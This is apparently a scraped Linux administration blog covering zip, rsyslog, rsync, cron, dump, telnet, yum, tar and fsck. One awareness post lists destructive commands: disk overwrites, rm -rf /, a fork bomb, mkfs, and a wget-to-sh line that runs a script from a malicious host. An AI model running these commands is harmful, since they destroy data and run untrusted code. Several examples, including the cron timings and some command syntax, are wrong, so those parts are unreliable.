Kindly Subscribe my Youtube Channel and support me
Leave a comment RHEL Networking Linux, Network tool, nmap, trace route 16 Jan
2020 VASANTH NIRMAL
How to Compress a
file/directory data in Linux?
28 Oct 2019 VASANTH NIRMAL
The most commonly used commands in Linux for compressing a file is zip and unzip .These
tools are installed by default in many latest Linux distributions.
Zip command to compress a file data
UNZIP command to decompress a file
Zip file(Compress)
Compressed files uses less disk space than the normal files ,the compressed files replaces
the original file with the new file that has an additional extension with .zip
Ex:1 To Compress a file
Syntax
#zip <new zip file name> <files to be compress>

In my current path i have a file with the name “bank.txt” which contains some logs,i will zip
this file with the below syntax,This command will give below mydata.zip which contains the
copy of the file named bank.txt in the current path.
#zip mydata.zip /bank.txt
Ex:2 To compress a Directory and all its contents
When you are compressing a entire folder then you must have to apply the recursive option with
the zip command as follows
Syntax
#zip -r <zip name> <directory to be compress>

Let me create a directory with some contents
#mkdir /data
#touch /data/logs
#touch /data/bank
#mkdir /data/mydirectorey
#mkdir /data/folder
Let me copy some contents to the files

#cp -vf /var/log/messages /data/logs
#cp -vf /var./log/secure /data/bank
Now let us compress the directory without -r option first
#zip project.zip /data
If you run without -r option then the zip command will try to compress only the files not the
directory
https://www.linuxvas
anth.com
As you can see from the above output the zip command did not compress the directory,now run
the same command with -r option and check
#zip -r project.zip /data
https://w
ww.linuxvasanth.com
As you can see from the above output .zip command successfully compressed the entire
directory,“deflated indicates the compression ratio” and “stored 0%” means its ab empty sub
directory,inside that no contents available .
To check the zip file
#ls
Ex:3 To unzip(extract) a file
Syntax to unzip
#unzip <zip file>

By default the unzip command extract only the .zip files,to extract a file do as follows
In this example i will unzip a file named “mydata.zip” from my current path

#unzip mydata.zip
The above command extract in the current directory path,if there are the original files,then it will
ask you to replace it.
To unzip a directory
#unzip project.zip
Ex:4 To compress all files in your current directory
In this example i have a directory with the name “tnp” which is having some data’s inside
#zip tape.zip *
Here “*” will select all the files alone from my current path “tnp”
Ex:5 To unextract in different directory path
Syntax
#unzip <zip file> -d <destination directory>

In this example we will decompress a file in the directory called “IT”
#unzip project.zip -d /IT
https://www.li
nuxvasanth.com
Ex:6 See the content of the zip file without decompressing
You can see the content of a zip file with unzip -l command as follows
#unzip -l project.zip
The above command will list the contents from the zip file called “project.zip”
Ex:8 To Exclude a certain file during decompression
As we are able to extract the files,it is possible to exclude certain files during decompression
Syntax:
#unzip <zip file> -x <files to be exclude> -d <destination dir>

“x” is the option to exclude the files
#unzip project.zip -x logs bank.txt -d /tmp
The above syntax will exclude the files logs and bank.txt while decompressing
Ex:9 To check if a compressed file has no errors
#unzip -t <zip file>
#unzip -t project.zip
If the compressed file has no errors then you will get the following output
Ex:10 To Print the details info about the compressed file
It is possible to print the details from the compressed file like ls -l
#unzip -Z <zip file>

#unzip -Z project.zip
That’s all Done!!!!..In our next article will update more about the Linux contents..staty
tuned @ www.linuxvasanth.com
How to Configure IP Address in Linux

Kindly SUBSCRIBE my YouTube Channel ,Click here to Subscribe

10, 2021


2 Comments RHEL(Red Hat Enterprise Linux) archive, compress, deflated, unix tar, zip, zip

tools 28 Oct 2019 VASANTH NIRMAL
How to configure syslog

Server in Linux
To identify the issues on Red hat server it is must to know and view the logs that
happens on the server in a specific period of time from log files saved in
the /var/log directory.
The syslog server on a Linux system can act as a monitoring point over a network where all
servers,routers,switches and most of the internal programs and services that generates the
logs,whether related to internal issues or info messages can send their Logs
Syslog server gives a centralized platform to access and manage the logs from Local system
as well as from the remote servers,Now let us configure syslog server to accept logs from
local system and remote server
Configuring Syslog server
Maintaining a secure server is keeping tracking of the issues that take place on the server,if you
really know what usually happens such as knowing when users log in to the system ,you can
apply log files to spot the actitvity. You can configure “syslogd” records through
the /etc/rsyslog.conf file .
syslogd daemon manages all the logs on your server and coordinates with any of the
logging operations of other servers on your network.The entrie confiuration informations
for syslogd daemon is saved in /etc/rsyslog.conf file which contains the names and locations
for your syslog files.
Note:By default system accepts logs only from the local host,In this example we will
configure a log server and accept logs from the client system.
In this example i have two servers Linux server and Linux client systems
1. Linux server with the IP address 192.168.1.15

2. Linux client with the IP address 192.168.1.13
3. Check portmp/ xinetd service is running on both the systems
4. update /etc/hots files on both the systems
5. Selinux and firewall should be in off state
Check the above srvice are in online by using the “service” command(Run this on both the
systems)
#service xinetd status
if the service is in offline,bring it to online as follows
#service xinetd start

On Linux Client
Now open the syslog configuration file /etc/syslog.conf
#vi /etc/rsyslog.conf
Client system can be configured to send logs via TCP and UDP protocols,both are show below
On client system open the rsyslog.conf file and enter the name and port of the centralized rsyslog
server details
*.* @<rsyslog server IP address>:<port>

 *.*=All Logs
 @=Single @ indicates UDP
 IP or Hostname of the rsyslog centralized server
 port=Port number (514)
To use TCP instead of UDP protocol means add additional “@” at the beginning as follows
*.*@@<rsyslog server IP address:<port>

Thats it,now restart the:rsyslog service to make the changes effect
#service rsyslog restart
Now restart the client system so it could send the log entry to the rsyslog server
Note:These Logs will generate only when the client boot,so do reboot not shutdown.
On Linux client
#reboot -f
Check Client Logs on rsyslog server

#tail -f /var/log/messages or #less /var/log/messages
At the end of this file you can check the logs from the Linux client system
https://www.linuxvasanth.com/how-to-configure-samba-server-in-red-hat-linux/
That’s all Done!!!!!!!!!!!!!!!!!!!

For more Linux and UNIX videos “CLICK HERE” Kindly SUBSCRIBE and support .
Leave a comment RHEL(Red Hat Enterprise Linux) log, logrotate, rsyslogserver, syslog 13 Aug
2019 VASANTH NIRMAL
Remote sync(rsync) command

examples in Linux
rsync command is used to copy and sync the files and directories locally as well remotely in
Unix and Linux environment.
The main advantage of rsync command is it copies only the updates blocks or bytes to the
destination path.
When you run rsync for the first time it copies the entire bytes to the destination path (like scp )
but when from the next time on wards it copies only the updated bytes or blocks to the
destination path.
One of the important feature of rsync tool is it uses “Delta transfer algorithm” which means it
will only copy or sync the changes from the source to the destination instead of copying the
entire content from the source which reduces utilizing the bandwidth over network.
Note:rsync is faster than scp command as it uses compression and
decompression method to sync
Basic syntax to run rsync command
rsync option source destination
Options:
-v = Verbose output
-a=Archive mode(it also preserve permission,ownership,links,timestamps)
-z=Cpmpress file data
-h=Human readble format
-r =Copies data recrussively
Ex:1 Sync/Copy files or dir Locally

Copy/Sync file on your Local system
Here in this example the following file will be sync from source to destination
The file called mydata.txt will be copy/sync on the destination file /var/iob

#rsync -zvh mydata.txt /var/iob
Note:If the destination file is not present already then rsync will create a new one,In the above
syntax i haven’t created the iob file before.
linuxvasanth.com/rsync
Ex:2 Copy a Dir from Local server to Remote server
In this example i will sync a directory from local server to remote server,on your local server the
dir called “bank” which will contain some rpm files and you want that local directory content to
be sync with the remote server
#rsync -avz /bank root@192.168.1.79:/repo
www.linuxvasanth.com/rsync
192.168.1.79 Remote Server IP
/repo Remote server destination directory

Dangerous commands you should never run on Linux https://t.co/3Spnxch8RP
— Linuxvasanth (@linuxvasanth) May 30, 2019
If you Appreciate what i do here on linuxvasanth.com,you should consider:
Subscribe
to our
email https://linuxvasanth.us17.list-manage.com/subscribe?
Updates u=88d7bc4e6f0dfbbd42369eab4&id=2546f9ba11
Subscribe
to our
YouTube
Channel: https://www.youtube.com/channel/UC6bR8In-jj9-klVlZQ6YH_A
Follow
My
Facebook
Page https://www.facebook.com/redhatvasanth/
1 Comment RHEL Networking 24 Jul 2019 VASANTH NIRMAL
Cron Jobs in Linux

In this article we are going to see how we can schedule and run different tasks in Background
automatically with defined timings.
We can use Cron to schedule automatic task at pre-determined times or intervals.Such process
can be scheduled and run automatically in the background without manual intervene by using the
cron daemon in Linux or UNIX Operating system.
You can autmate process like backup,scheduled updates and sync files etc.Cron is a daemon to
run shedule task.Cron checks every minute and checks the task in cront table.
Crontab means Cron table where we can schedule the repeated tasks.
Crontab file consists of six fields and separated either by space or tab,The beginning five fields
represents the time to run the tasks and the last field is for command
Let us check the crontab fields
1)Minutes range:0-59
2)Hours range:0-23
3)Days range:0-31
4)Months range:0-12
5)Days of week range:0-7 0 or 7 represents Sunday,Starting from Monday
6)Path to the command:Full path of the script or command
Note: Cron uses some operators which will allow you to specify different values in a filed.
1)Asterisk(*):Specifies all possible values for a field
2)Comma(,):Specifies list of values
3)Dash(-):Specifies range of values
4)Separator(/):Specifies a step value
Ex:1 Create a Cron job
Task:Print the content from the Secure log file daily 4:00 pm
Check you current date and time details on your server
#date
Edit the crontab file by using the below command
#crontab -e
run the cat /var/log/secure file daily at 10:55
Ex:2 To check the scheduled Cron jobs:
#crontab -l
Ex:3 To run the job at 9 pm during the week

0 22 * * 1-5 cat /var/log/secure
Ex:4 To run the job at 18 minutes after midnight,1 am and 5 am,everyday
23 0-23/2 * * * cat /var/log/secure
Ex:5 To run a command every 05:05 every Sunday
5 4 * * ping 10.250.1.55
To delete all Cron jobs
#crontab -r
This will remove all the scheduled jobs from cron table
To prompt a confirmation before deleting a cron job
#crontab -i -r
-i option prompt you confirmation from a user before deleting the using cron job’s
Ex:6 To schedule a cron job for specific time
This job is to delete the empty files and directory from /tmp at 1:30 am daily.You will need to
mention user name to run crontab command ,Here in this example root user is performing the job
#crontab -e
Ex:7 To restrict CRON to authorized user only

the file /etc/cron.allow which will allow the users to run the cron
If these file exists and if the corresponding file /cron.deny don not exist,then only the users
listed in the /etc/cron.allow file can run the crontab to submit their jobs
Open the /etc/cron.allow file and add one line for each users to use the crontab command to
create cron jobs
#vi /etc/cron.allow
vasanth
joel
vijay
rohit
In the below entry the user “valencia” is not listed,even though a user valencia is not listed
in cron.allow file,he can still run as that user.The cron.allow file controls the administrative
access to the crontab command for scheduling and editing the cron jobs.If the user valencia is
listed in cron.deny file then he will not allow to run the cron jobs.
******************************************************************************
***************************************************

1.Subscribe to our email Updates: Sign Up Now
2.Subscribe to our YouTube Channel: Sign Up Now My You Tube Channel
3.Follow My Facebook Page: Sign Up Now
4.Share it with your friends
******************************************************************************
******************************************************
Leave a comment RHEL(Red Hat Enterprise Linux) at jobs, automatic jobs, cron 23 Jul

2019 VASANTH NIRMAL
Dangerous commands you
should never run on Linux
Basically Linux and UNIX command Lines are very useful and productive,but sometimes it
might be very dangerous when you are not sure about what you are doing with the
commands.This post is just to create awareness of some of the commands which you must think
twice before you execute them.
1.date >/dev/sda
The above command writes the output of the “command” on the block /dev/sda. The above
command writes the raw data and all the files on the block will be replaced with the raw
data,thus resulting in total loss of data on the block.
Not only date command ,any command >/dev/sda resulting in loss of data.You should never
run this command in Servers.
2.rm -rf command
This command is to remove the directories and files fastly,but a little typo or ignorance may
result in to unrecoverable system damage,some of the important options we use it
with rm command are,
rm Command is used to delete the files
rm -f Command removes the files without warning
rm -rf / Force deleting everything in / directory
rm -rf * Force deletion of everything in current working directory
rm -rf Force deletion of current directory and sub directories.

So ,be very careful when executing rm command in servers,To overcome accidental delete of file
by “rm” command create an alias of “rm” command as “rm -i” in the /root/.bashrc file it will
ask you to confirm every deletion
3.:(){:|:&};: command
The above command is actually a dangerous one.It operates by defining a function
called ‘:’,which calls itself twice,once in the foreground and once in the background ,,it keeps
on executing again and again till the system freezes.
4.mv dir /dev/null
The above command will move “dir” to /dev/null .In Linux /dev/null is a special file that
discards all the data written to it and reports that write operation succeed
#mv /home/user /dev/null
The above command will move all the contents of a user directory to /dev/null, which means
everything there was sent to the black hole (/dev/null)
5.wget http://malicious_source-0-|sh
The above command will download a script from a malicious source and then execute it. wget
command will download the script and sh will execute the script
You should be aware when your are downloading a package from unknown resources,use the
scripts and packages which is downloaded from trusted source.
6.mkfs -t ext4 /dev/sda

The above command will format the block “sda” and you wouls surely be knowing that after
execution of the above command you block (Harddisk) would be new ,without any data ,leaving
your system in to unrecoverable stage.
WARNING: Don’t execute any of the above command on Linux terminal or your office
server.If you want to test run them in virtual machine .
Any data loss due to the execution of the above command will break your system down ,the author of the
article /linuxvasanth.com will not be responsible .

******************************************************************************
***************************************************

******************************************************************************
******************************************************
2 Comments RHEL(Red Hat Enterprise Linux) Linux, mkfs, mv, rm, unix commands, wget 29

May 2019 VASANTH NIRMAL
How to take root file-system

Full back in Linux servers
4 Apr 2019 VASANTH NIRMAL
In this article we will see how to take root file system (i,e / partition ) full backup to another
hard-disk.In UNIX/Linux flavors we will use the “dump” command to take the full and
incremental backups.there are lots of backup tools available which makes the backup task very
much effective and faster,Linux uses the dump utility to take backup up.
Full backup of your file system in Linux could be done easily with the dump and restore
command
dump = This command would captures the data files and the same could be restored with the help of
"restore" command.
Let me show you how to take a root file system full back in Linux.
Before that always remember you will need to switch to the run-level-1 single user mode to
take the root file system backup,Linux will not allow you to take the root file-system backup
in run-level-3/5.
You can take the backup of the file system other than “/” either from run-level-3 or run-level-
5.
Setup Environment:
Oracle VM has got 2 hard-drives-sda&sdb,The main root file-system in installed
on /dev/sda1 partition as shown below ,
Note: I will be using the other drive /dev/sdb1 Partition used to store the disk dump i.e the backup data.
Now i will take the /dev/sda1 disk partition backup using the “dump” command where the root
file system resides, and it stores the dump in /dev/sdb1 partition.
Always remember to take root file system backup it should be done in single user
mode,Other partitions could be done either in run-level 3 or 5 .
Check the currently mounted partition details
#df -h

As you can see from the above output /dev/sda1 is mounted under “/” and /dev/sdb1 is
mounted under /mnt path
Now Let me bring down my server to Run-level-1 (Single user mode) to take the root file system
full backup.
#init 1
The above command will put the server in single user mode.
Once logged in to single user mode verify the current run-level by using the following command
#who -r
The above output shows you are in Single user mode.
Now take the root file system full back using the dump command
#dump -ouvf /mnt/sdb1 /dev/sda1

/mnt/sdb1 =Dump path
/dev/sda1=File-system to be backup
0= Full Backup
v=Verbose output
-f = To mention the Dump path
Note: Number 1 to take incremental backup
After executing it will start dumping the data in to /dev/sdb1 disk as shown below
Once it has successfully dumped all the data, you will get the below message on your terminal
/etc/dumpdates=This file holds the file system backup information’s along with the type of
backup taken
Let me check the backup information by using the cat command
#cat /etc/dumpdates
Thats it!!!!!!
******************************************************************************
***************************************************

******************************************************************************
******************************************************
1 Comment RHEL(Red Hat Enterprise Linux) backup, dump, Filesystem backup, Linux

dump, restore 4 Apr 2019 VASANTH NIRMAL
Telnet Configuration in Red

Hat Linux-6
Telnet is a Protocol used on the Internet or Local Area Network’s to Provide a Bidirectional
interactive text oriental communications using a Virtual Terminal connection.Telnet was
originally Developed in 1969 for the Private use .The main disadvantage of this protocol is it will
not encrypt or secure the data over the connection.It is highly recommended by the experts not to
use this protocol where security is the main concern.
Two Packages are needed to configure the telnet:
1.Telnet-server
2.Telnet-client
Telnet-server:This Packages is installed on the Remote system.You should configure it
manually before the client can access/connect it.
Telnet-Client:This software allows you to connect to the Telnet server.After the client
establishes the connection to the remote system,client becomes the virtual terminal it allows you
to communicate with the remote system from your system.
TELNET uses the Port Number 23
Disadvantages of Telnet:
1.Direct “root” user Login is not Allowed in Telnet
2.Telnet dose not encrypt any data over the connection.
3.It uses Plain text while transmitting the data over the connection.
4.Telnet is the part of “xinetd” Daemon in Red Hat Enterprise Linux.
Configure Telnet in Red Hat Linux-6

First check the required packages are installed,if it is not installed ,install them with the help
of “rpm” tool.
1.telnet-server
2.telnet-client
3.xinetd
[root@REPSERVER ~ 08:14 PM]#rpm -qa telnet-server
telnet-server-0.17-46.el6.x86_64
[root@REPSERVER ~ 08:14 PM]#rpm -qa telnet
telnet-0.17-46.el6.x86_64
[root@REPSERVER ~ 08:15 PM]#rpm -qa xinetd
xinetd-2.3.14-29.el6.x86_64
Once you have confirmed all the required packages are installed ,check the xinetd configuration
files as shown below,
[root@REPSERVER ~ 08:17 PM]#vi /etc/xinetd.d/telnet
Make sure that disabled = yes is changed to disabled = no,if it is in “yes” change it to “no”
Now turn on the telnet and xinetd services as shown below,
Check the “xinetd” service status and restart the service as show below,

Now let us create a non-root user account since telnet will not allow you to login directly as
a “root” user,first you will need to login via non-root user account and then by using
the “su” command you can switch to the “root” user account.
Now on Client Machine also you need to do the above process,once you have successfully done
the configuration on the client machine ,now its time to connect to the remote system as follows.
Now I will login to the remote server( IP is 192.168.1.55) from 192.168.1.77 server.

On Server 192.168.1.77
Run the following syntax to login via telnet
[root@PRSERVER ~]# telnet 192.168.1.55

Trying 192.168.1.55...
Connected to 192.168.1.55 (192.168.1.55).
Escape character is '^]'.
Red Hat Enterprise Linux Server release 6.0 (Santiago)
Kernel 2.6.32-71.el6.x86_64 on an x86_64
login: demouser
Password:
As you can see from the above output , you must Login with the non-root user account first(coz
telnet will not allow you to login directly with “root” user account)
Kernel 2.6.32-71.el6.x86_64 on an x86_64

login: demouser
Password:
Last login: Fri Jan 4 21:12:32 from 192.168.1.77
Welcome demouser to the linuxvasanth.com
Date: Fri Jan 4 21:18:43 IST 2019
[demouser@REPSERVER ~]$ su - root
Password:
Welcome root to the linuxvasanth.com
Date: Fri Jan 4 21:18:50 IST 2019
[root@REPSERVER ~ 09:18 PM]#
That’s all Telnet configuration is Done on Linux Boxes.
Configure “TELNET” on Windows 7 Machine
Its very easy, open the command prompt and execute the command as follows
Here I am going to connect the Linux server (192.168.1.55) from my Windows system(IP is

192.168.1.253)
On Windows System
The above error shows the “telnet” service is not turned on ,so you need to start the telnet
service from the control panel manually as shown below,
Open the control panel and then click on the Turn windows features On/Off
Now Scroll down and enable telnet services as shown below

Now you can execute the telnet command
As you can see from the above screen shot,after enabling the telnet services, it prompts the
message to login to the Linux server,once you give the correct credentials you will get the Linux
prompt.
You can run the Linux commands as shown below

To logout type “exit” from the command prompt
That’s it Done!!!!!!!
Click here to check SSH AND SCP Protocols in Detail Understanding SSH & SCP Protocols
in Linux Server
Click here to check how to configure SFTP Server Uploading and Downloading data’s with
SFTP Protocol
******************************************************************************
***************************************************

******************************************************************************
******************************************************
Leave a comment RHEL(Red Hat Enterprise Linux) port, redhat telnet, remote access, remote

login, root login, SSH, tcp/ip, telnet 19 Feb 2019 VASANTH NIRMAL
Yum configuration in Redhat

Linux 6
In this Tutorial, we will see about yum in Red hat Linux. Yum stands for Yellow Dog Modifier.
We can also use the “rpm” tool to install, uninstall the Linux packages, The difference between
yum and rpm is, the “rpm” installs the given package only, whereas “yum” works with the
Repository where Packages are kept.
1)Repositories(is a collection of all.rpm packages/files): It is the place where all the Packages
are kept. Yum uses these repositories to get the correct and exact version of the packages while
install/uninstall the packages.
2)Yum will have the URL’s of repositories in its configuration file
3)Yum is an opensource tool developed under the GPL(General Public License) which means
anyone could download and they can also modify the code as per the requirement.
4)A Repository could be configured Locally or Remotely.
Configuration File for YUM:
Yum always uses its configuration file to fetch the packages. The configuration files come under
the /etc/directory
The path for the configuration file is /etc/yum.repos.d

Difference Between Yum and rpm:
1. Rpm tool installs the given package only
2.rpm will not check and install the dependencies packages
3. Yum will check and install all the dependencies packages automatically.
4. Yum is capable of tracking the dependencies of packages and installing them prior to
installing the package that the client needs to install
How to Configure Yum Repository?

Four packages must have installed before configuring the yum repository.
1.vsfstpd
2.deltarpm
3.python-deltarpm
4.createrepo
Check whether it is already installed or not by using the below command
#rpm -qa vsftpd*
#rpm -qa deltarpm*
#rpm -qa python-deltarpm*
#rpm -qa createrepo*
If the above packages are not installed already then install it with the help of rpm command as
follows
#rpm -ivh vsftpd
#rpm -ivh deltarpm
#rpm -ivh python-deltarpm
#rpm -ivh createrepo
Let us insert the installation disk and mount it, in Linux by default the disks are mounted
under /media directory path.
Step:1 Create a Directory
#mkdir /red
This Directory would be used to store all RPM Packages from Disk, here we will
use /red directory.
Now copy all the .rpm Packages from the installation disk to the /red directory.
Change your path to /media

#cd /media
#ls
You will need to copy two directories “Packages” and “RPM-GPG-0KEY-REDHAT-
RELEASE” to /red location s follows,
#cp -rvf Packages/ RPM-GPG-KEY-REDHAT-RELEASE /red
Now let us make that file which will be holding the package names and another
repository information, for this, we should run another one tool called “createrepo” .This will
create the database which will have all the package information
#createrepo --database /red/Packages
The above output shows, createrepo started copying all the

database under /red/Packages location
Once it is copied all the database you will get the following output as shown below
During this process, many cache files will generate you should clear them after the configuration
is completed.
As we know yum uses Repository configuration file to check the available Repositories, now let
us create a necessary Repository configuration file for our Local Repository.
#vi /etc/yum.repos.d/data.repo
[linuxvasanth]
name=Yum Repository
baseurl=file:///red/Packages
enabled=1
gpgcheck=1
gpgkey=file:///red/RPM-GPG-KEY-redhat-release
:wq
[linuxvasanth]=Label of Repository, as we know repository configuration files are saved in /etc/yum.repos.d path,
The repository file holds configuration file for multiple repositories. This label is used as the identifier for the
repositories.
name=Is used to assign the name of the repository
baseurl=It shows the path of the rpm files
enabled=1 It shows the state of the repository, Numeric value "1" means repository is enabled and "2" means
repository is disabled
gpgcheck=1 It defines the integrity of the package should be check or not, value "1" means integrity should
check and "0" means integrity should not check
Always run the below command after the yum configuration
#yum clean all
That’s it. Yum configuration is Done!!!!!

To Check all the Enabled Repositories
#yum repolist
As you can see from the above output it shows the available Repositories ,since we have only
one repository (my yum server) it shows that one here
To List all the Installed Packages by using the “yum” command
#yum list installed |more
As you can see the above output ,it displays all the installed packages along with details.
To Display only the total Numeric count of all Installed
Packages
#yum list installed |wc -l
The above syntax displays only the total count of all installed packages instead of displaying all
the packages along with the details.
To Install a Package with yum command

In this example i will install the “telnet” package
#yum install telnet

As i said “yum” will automatically check all the dependencies packages and install them as
shown below,
As you can see from the above output “telnet” package has been installed successfully.
To Uninstall a Package:
To uninstall a package run the following syntax
#yum erase telnet

After giving “y” it will uninstall all the telnet packages
As you can see from the above output “telnet” package is successfully uninstalled.
To Get the Details of a Package with Yum
To get the information’s about a package before you start installing them,run the below
command
#yum info httpd

******************************************************************************
***************************************************

******************************************************************************
******************************************************
1 Comment RHEL(Red Hat Enterprise Linux) dependecies, how to install packages in

linux, package installation, repositories, rpm, url of the repositories, yum 5 Feb
2019 VASANTH NIRMAL
Top 7 Linux Linux Scenario
Based Interview Questions
and answers(L1&L2)
Linux Scenario Based Interview Questions and answers
1.What is Ulimit and umask?
ulimit is an inbuilt default Linux command which is used to control over the resources available
to shell and processes .
umask(User File Creation Mask) which is used to control the permissions assigned for the files
and directories.
2.What is Run-level in Linux and how to change them?

A run-level is a system state of init and the whole system that defines what system services are
operating and they are identified by numbers in Linux for different purpose.
To change the runlvel you will need to edit the “/etc/inittab” file and change the default init
entry “id:5:initdefault
You can switch to different run-levels with the help of “init” command followed by the run-level
number (init 3)
3.Scenario 1: On one of my production server Linux,the storage team has extended

the partition from their end.Now how to re-scan the partition and extend without rebooting
from Linux.
Answer:In my case 6th Disk on Controller-1 was extended by the storage team,first re scan it by
using the following command
#echo 1 >/sys/class/scsi_device/device/rescan
Now resize the pv by using the following command

After this check the size of the volume group this time it should display the new extended size
and with the help of “lvextend” command now we can easily extend the size of lv partition.
4.What is the maximum Length for a file name allowed in Linux?
Any file name can have a most extreme of 255 characters.This farthest point does exclude the
path name,so accordingly the whole path name and file name could very much surpass the 255
characters.In interview ,the interviewer asks this question to confuse the candidate by further
asking if the mentioned includes the path name.So get prepared with the complete answer.
5.What is Network Bonding and explain?

It is the process of bonding or joining two or more than two network interfaces to create one
interface.It helps in improving the bandwidth,Load balancing,redundancy as in case of any of the
interfaces is down,the other one will continue to work
Visit My Website to know more about Network Bonding Understanding Network

Bonding
6.Scenario: On one of my Linux server the sybase database is not running
because of the tmpfs. Sybase team wants to extend the size of tmpfs file system
from 1.5GB to 4GB
Now check the tmpfs file-system details
#df -h
Now edit the /etc/fstab file to increase the size

Change the size as shown below
Remount the filesystem as shown below
#mount - remount tmpfs
#df -h
As you can see from the above output now tmpfs size has been extended to 4G
7.Sceneriao: df and du command shows different Disk usage

Solution: This could be because of open file deletion i.e, when someone deletes the log file that
is being used or open by other process if we try to delete this file then the file name will be
deleted but its inode number and data will not be deleted
By using the “lsof” command we can get the list of open files,run this command under /var path
to get the details
#lsof /var |egrep "^COMMAND|deleted"
To release the space ,we could kill the command by using its PID number.
I hope you find this guide useful

More good stuffs to come,Stay tuned!!!!
Mail me your queries to vasanth@linuxvasanth.com
#############################################################
For More Videos Subscribe My Youtube Channel Linux Vasanth

If you found this article useful, Kindly Subscribe here Click this link to Subscribe
##############################################################################
##
4 Comments RHEL(Red Hat Enterprise Linux) interview questions, RHEL, unix 25 Jan

2019 VASANTH NIRMAL
What is Run Level in Linux?

Run-level is a system state on how the process is starting and what process to run ,which service
to enable and disable while booting is decided by the Run-level program.While booting process
after the kernel has started the init program it reads the /etc/inittab file where the default run-
level entry saved. and then it starts all the services.
There are totally seven run-levels available in UNIX ,according to the OS the run-level number
may vary.
Types of Run-levels:
In Linux by default it boots either Run-level 3 or run-level 5.You can also modify or switch to
different run-levels as per the needs.
To check the current Run Level settings:
#who -r
r=Run-level
Sample output for the above command would be
To check the current and previous Run-level details

#runlevel
Sample output for the above command would be
In the above output ,“N” indicates the run-level has not been changed since the system was
booted.“3” is the current run-level
Video Player
00:00
00:00
To change the default Run-level
/etc/inittab file holds the default run-level entry,open this file with the vi editor and change the
run-level number to your desired one as follows,
Here am going to change the run-level from 3 to run-level 5
#vi /etc/inittab
Modify the line as follows
remove 5 and add 3 in the above line,after update reboot the system to login n to the new run-
level
To reboot use the following command
#init 6
I hope you find this guide useful
More good stuffs to come,Stay tuned!!!!
Mail me your queries to vasanth@linuxvasanth.com

#############################################################
##############################################################################
##
Leave a comment RHEL(Red Hat Enterprise Linux) init, Linux, Redhat, runlevels, who 11 Jan

2019 VASANTH NIRMAL
Understanding tar(Tape
Archive) command in Linux
tar(Tape Archive) is used to group multiple files in to a single archive file.An Archive file it
consists of any number of different files and also it contains the details to allow them to restored
to their original format.Archive files are more easier to transmit or upload to the destination drive
or media.
tar program first originally developed for the backups on the magnetic tape drive,later it can
be now used to create archive files on a file system.tar will not compress the size of the data ‘s
,but it is very easy to compress the archive files created with tar utility.
Basic syntax for “tar”:
#tar <options> <archive file> <files to be archive>
Let us see the available options that can be used with the tar command
-c = To create a new archive file(with the extension .tar)
-v = Verbose Output
-f = To mention the files
-x = To untar the archive file
-t = List the contents from the archive file

Ex:1 To create tar archive file
In this example i will add different files from various location in to the archive file
/backup.tar = Archive file name
/mylog = A file from / directory
/mydir/database = A file from the /mydir path
/var/userdata = A file from /var directory path

#tar -cvf /backup.tar mydata.tar /mylog /mydir/database /var/userdata
#ls
As you can see from the above output ,the archived file with the name backup.tar is created
successfully.
Ex:2 Untar the archive file
##If you want to unarchive in your current path run the below syntax
#tar -xvf mydata.tar
##If you want to unarchive in different path run the below syntax
#tar -xvf mydata.tar -C <destination path>

In this example i use the different destination path to untar
#tar -xvf mydata.tar -C /home/vasanth

Here i use the destination path as /home/vasanth directory
Now go and check the destination path whether it is successfully unextracted the files
#cd /home/vasanth
#ls
As you can see from the above output ,all the files from the archive successfully unarchived
Ex:3 To List the contents from the Archive file

To display the contents from the archive file ,apply -l option with the tar command as shown
below
#tar -tvf <archive file>
#tar -tvf /backup.tar
The above command will display the contents of the /backup.tar file
The above command will not unarchive the archive file,it just list the content from the archive
file.
Ex:4 To add additional file inside the archive file

If you want to add any additional files inside the archive file apply -t option with the tar
command as follows,
#touch /rootlog
For More tutorial videos subscribe my YouTube
channel Linux Vasanth
Video Player
00:00
00:00
Now i will add /rootlog inside /backup.tar file
#tar -rvf backup.tar rootlog
-r = To add additional files in to the archive file
Check whether it is added or not
#tar -tvf /mybackup.tar

As we can see from the above output,the file /rootlog is added inside the archive file
Ex:5 To delete a specified file from the archive file
In this example i will delete the file rootlog from the backup.tar file
#tar -f backup.tar --delete rootlog
Note: To delete multiple files ,add space and give the file names
To confirm whether it is removed from the archive file
#tar -tvf /backup.tar

As you can see from the above output rootlog file has been removed from the archive file.
I hope you have enjoyed this tutorial if so Kindly subscribe and share it with
your friends.
Thank you
You can reach me at vasanth@linuxvasanth.com
#############################################################
##############################################################################
##
2 Comments RHEL(Red Hat Enterprise Linux) archive, how to archive, Linux, tar 14 Dec

2018 VASANTH NIRMAL
Understanding “fsck” in
Linux
Importance of FSCK Utility
No one can predict when the system will get crash or your filesystem gets corrupt and if it
happens then you may lose all of your valuable data from your hard drive. If you found that your
filesystem creates such inconsistency then it is always run fsck to check the integrity, and this
can be completed by using the special command called “fsck”(Filesystem consistency
check). You can run this command manually or can start at the boot times.
You will need to run “fsck” on the following situation occurs
1.Taking a backup of your filesystem
2. Files on your system become corrupt
3. To do the consistency check
Ex:1 To run fsck on the filesystem
Syntax:
#fsck <filesystem> or fsck <mount point dir>
Note: To run fsck on a filesystem, the filesystem should be in the unmounted state and
inactive, You should never run fsck on the mounted partition doing so would corrupt the
filesystem.
First check the filesystem is in mounted or in the unmounted state by using the following
command
#df -h
As you can see from the above output,/dev/sda2 is in the mounted state, now unmount this
filesystem by using the following command
#umount /dev/sda2
#df -h
Now run the fsck on this filesystem for integrity check
#fsck /dev/sda2
As you can see from the output, fsck hasn’t found any errors from the /dev/sda2 filesystem.
To Repair the Linux Filesystems errors automatically
When the filesystems have more than one errors, then for each and every scan fsck will ask the
confirmation before it proceeds to repair all the errors, apply -y option with the fsck command to
do the check and repair automatically.
#fsck -y /dev/sda2
Running fsck on the mounted partition:

If you run the fsck on the active partition then the file system will go to the corrupted state,
Understanding fsck exit codes

While running the fsck, we may get some error codes, below are some of the important error
codes we will get after the execution
0 =No errors
1 =File system error corrected
2 = System should be rebooted
4 = File system error left uncorrected
16 = syntax error
32 = Checking cancelled by the user

To check the fsck error codes, run the following command after fsck,
#fsck /dev/sda2
#echo $?
The above command will produce some error code after the execution of fsck command
As you can see from the above output echo $? command produced “0” error code which says
there is no error found on the fsck scan.
Visit my youtube channel for more online tutorials

Video Player
00:00
07:19
To check the filesystem only for errors and don’t repair
When you want to scan only for the errors and you don’t want to repair, then run the below
command with -n option
#fsck -n /dev/sda2
The above command will scan only for the errors.
To run the fsck only on Unmounted partitions
When you are not sure about the mounted and unmounted partition details, run the below
command, this will run fsck only on the unmounted partitions, when fsck detected any mounted
partitions while running it will skip running on that partitions.
#fsck -M
